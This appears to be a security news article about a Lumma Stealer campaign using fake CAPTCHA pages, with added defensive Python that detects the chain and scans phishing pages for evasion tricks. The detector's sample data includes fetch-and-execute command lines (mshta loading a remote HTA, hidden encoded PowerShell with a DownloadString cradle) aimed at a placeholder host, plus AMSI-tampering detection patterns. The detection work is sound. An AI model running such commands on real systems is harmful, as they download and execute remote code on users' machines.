Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the infamous Lumma information stealer.
"The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News.
"The campaign also spans multiple industries, including healthcare, banking, and marketing, with the telecom industry having the highest number of organizations targeted."
The attack chain begins when a victim visits a compromised website, which redirects them to a bogus CAPTCHA page. Instead of a real challenge, the page instructs the visitor to copy a command and paste it into the Windows Run prompt; the command uses the native mshta.exe binary to download and execute an HTA file from a remote server.
It's worth noting that a previous iteration of this technique, widely known as ClickFix, involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.
The HTA file, in turn, executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before taking steps to bypass the Windows Antimalware Scan Interface (AMSI) in an effort to evade detection.
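The chain above is well suited to endpoint detection: every stage runs a living-off-the-land binary under a parent process that does not fit the binary's legitimate use (mshta.exe launched by explorer.exe from the Run dialog, then PowerShell launched by mshta.exe). The following is an added example, not code from Netskope or The Hacker News, that triages process-creation records shaped like Sysmon Event ID 1 fields. It also decodes a Base64 -EncodedCommand argument of the kind the earlier ClickFix variant used, so the decoded script can be scanned for download cradles and AMSI-tampering strings rather than only the visible command line. The file paths, the example.invalid URLs, the sample command lines and the field names are all constructed for the example.

```python
"""Triage process-creation events for the fake-CAPTCHA / ClickFix chain.

Added example for this article; it is not code from Netskope or The Hacker News.
Events are constructed and loosely follow Sysmon Event ID 1 field names.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # path of the created process
    command_line: str   # full command line
    parent_image: str   # path of the parent process


def _base(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Living-off-the-land binaries used in the chain the article describes.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe"}
# explorer.exe as parent means the Run dialog or a double-click, i.e. a person
# typed or pasted the command, which is the ClickFix tell.
INTERACTIVE_PARENTS = {"explorer.exe"}

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
# Strings that commonly appear in in-memory AMSI patching; treat as high confidence.
AMSI_TAMPER = re.compile(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer|amsi\.dll", re.I)


def decode_encoded_command(command_line: str):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64) or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcEvent) -> list:
    """Return the reasons an event looks like part of the chain (empty list = benign)."""
    img, parent = _base(ev.image), _base(ev.parent_image)
    if img not in LOLBINS:
        return []
    reasons = []
    text = ev.command_line
    if parent in INTERACTIVE_PARENTS:
        reasons.append("launched from an interactive parent (Run dialog)")
    if img == "mshta.exe" and REMOTE_URL.search(text):
        reasons.append("mshta.exe fetching a remote HTA")
    if parent == "mshta.exe":
        reasons.append("spawned by mshta.exe")
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        text = text + "\n" + decoded   # scan the decoded script as well
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download cradle")
    if AMSI_TAMPER.search(text):
        reasons.append("AMSI tampering strings")
    return reasons


def triage(events) -> dict:
    """Map event index -> reasons, for every event that raised at least one."""
    return {i: r for i, ev in enumerate(events) if (r := score_event(ev))}


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry; example.invalid is a reserved, non-routable name.
SAMPLE_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s2.ps1')"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/verify.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -ep bypass -enc " + encode_ps(SAMPLE_STAGE2),
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\setup.hta",
              r"C:\Program Files\Vendor\setup.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
              r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS).items():
        print(i, _base(SAMPLE_EVENTS[i].image), "->", "; ".join(reasons))
```

The parent-process checks carry most of the signal: a locally installed HTA run by a vendor installer and a scheduled PowerShell inventory script (events 2 and 3) raise nothing, while the two stages of the chain each raise several reasons. Decoding the encoded argument matters because the download cradle in event 1 is invisible on the raw command line.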
"By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all the necessary steps outside of the browser context," Fróes explained.
"The Lumma Stealer operates using the malware-as-a-service (MaaS) model and has been extremely active in the past months. By using different delivery methods and payloads it makes detection and blocking of such threats more complex, especially when abusing user interactions within the system."
As recently as this month, Lumma has also been distributed via roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect users to download password-protected archives.
These archive files contain an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, according to Sekoia researcher crep1x. In early 2023, threat actors leveraged a similar technique to spin up over 1,300 domains masquerading as AnyDesk in order to push the Vidar Stealer malware.
The development comes as Barracuda Networks detailed an updated version of the Phishing-as-a-Service (PhaaS) toolkit known as Tycoon 2FA that includes advanced features to "obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages."
These include the use of legitimate, possibly compromised, email accounts to send phishing emails, and a series of steps to prevent analysis: detecting automated security scripts, listening for keystrokes that suggest web inspection (such as the DevTools shortcuts), and disabling the right-click context menu.
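From the defender's side, the same anti-analysis features are fingerprints. The following is an added example, not code from Barracuda or from the Tycoon 2FA kit, that scores fetched page source for the tricks named above (automation checks, DevTools hotkey traps, debugger loops, right-click blocking). The weighting is the point of the example: right-click blocking alone is common on legitimate sites and should not trip a verdict by itself, whereas a webdriver check or a hotkey trap on a login page rarely has an innocent explanation. Both sample pages and the indicator patterns are constructed heuristics, not signatures taken from the kit.

```python
"""Score page source for analysis-evasion tricks of the kind the article describes.

Added example; not code from Barracuda or from the Tycoon 2FA kit.
Sample pages are constructed and the regexes are heuristics, not kit signatures.
"""
import re

# (name, weight, pattern). Weights reflect how often legitimate pages do the
# same thing: right-click blocking is common, automation checks are not.
INDICATORS = [
    ("blocks right-click context menu", 1,
     re.compile(r"contextmenu[\s\S]{0,80}?(preventDefault|return\s+false)", re.I)),
    ("traps DevTools hotkeys (F12 / Ctrl+Shift+I,J,C)", 3,
     re.compile(r"key(Code|)\s*={1,3}\s*123|ctrlKey\s*&&\s*\w+\.shiftKey", re.I)),
    ("checks for automation (navigator.webdriver / headless)", 4,
     re.compile(r"navigator\.webdriver|HeadlessChrome|__selenium|_phantom|callPhantom", re.I)),
    ("debugger trap loop", 3,
     re.compile(r"setInterval\s*\([\s\S]{0,60}?debugger", re.I)),
    ("devtools-open window-size check", 3,
     re.compile(r"outerWidth\s*-\s*\w+\.innerWidth|outerHeight\s*-\s*\w+\.innerHeight", re.I)),
]

SUSPICIOUS_THRESHOLD = 5   # tunable; chosen so right-click blocking alone passes


def scan_page(source: str):
    """Return (score, [indicator names]) for a page's HTML/JS source."""
    hits = [name for name, _w, pat in INDICATORS if pat.search(source)]
    score = sum(w for name, w, _p in INDICATORS if name in hits)
    return score, hits


def is_suspicious(source: str, threshold: int = SUSPICIOUS_THRESHOLD) -> bool:
    return scan_page(source)[0] >= threshold


# Constructed sample: a credential form wrapped in several evasion tricks.
PHISH_SAMPLE = """<html><body><form id="login"><input name="password"></form>
<script>
if (navigator.webdriver) { location.href = 'about:blank'; }
document.addEventListener('contextmenu', function(e){ e.preventDefault(); });
document.addEventListener('keydown', function(e){
  if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && e.keyCode === 73)) { e.preventDefault(); }
});
setInterval(function(){ debugger; }, 100);
</script></body></html>"""

# Constructed sample: a photo gallery that only disables right-click on images.
BENIGN_SAMPLE = """<html><body><img src="gallery.jpg">
<script>document.addEventListener('contextmenu', e => e.preventDefault());</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        score, hits = scan_page(page)
        print(label, score, is_suspicious(page), hits)
```

A static scan like this complements, rather than replaces, a sandbox: if the sandbox's browser is detected through navigator.webdriver, the kit will never render its credential form, so the scan should run on the raw response body before any JavaScript executes.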
Social engineering-oriented credential harvesting attacks have also been observed leveraging avatar provider Gravatar to mimic various legitimate services like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
"By exploiting Gravatar's 'Profiles as a Service,' attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials," SlashNext Field CTO Stephen Kowski said.
"Instead of generic phishing attempts, attackers tailor their fake profiles to resemble the legitimate services they're mimicking closely through services that aren't generally known or protected."